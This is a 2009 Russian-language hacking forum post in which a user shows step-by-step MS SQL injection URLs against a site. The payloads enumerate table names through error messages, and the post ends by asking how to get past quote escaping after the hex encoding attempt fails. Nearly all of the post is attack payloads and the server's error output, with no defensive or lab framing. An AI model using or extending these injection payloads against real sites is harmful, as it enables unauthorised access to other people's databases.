15.07.2009, 13:44
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Привет
У меня всего 2 раза был опыт MS SQL inj И тут решил спонить старое
нашёл инъекцию
Код:
http://site.ru/index.php?name=Links'
далее довёл до ума
Код:
http://site.ru/index.php?name=Links'))--
\Потом начал крутить таблицы
Код:
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
получил 1 табличку audit и решил проверить что ниже
Код:
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('audit'))--
На что меня послали куда подальше
Код:
message: Incorrect syntax near 'audit\'.
видно что он скобку экранировал...(пробовал " ' `)
Как можно это обойти?
Попробовал в хексе но написал еррор
Код:
message: Conversion failed when converting the nvarchar value 'audit' to data type int.
Последний раз редактировалось Byrger; 15.07.2009 в 14:05..
|
|
|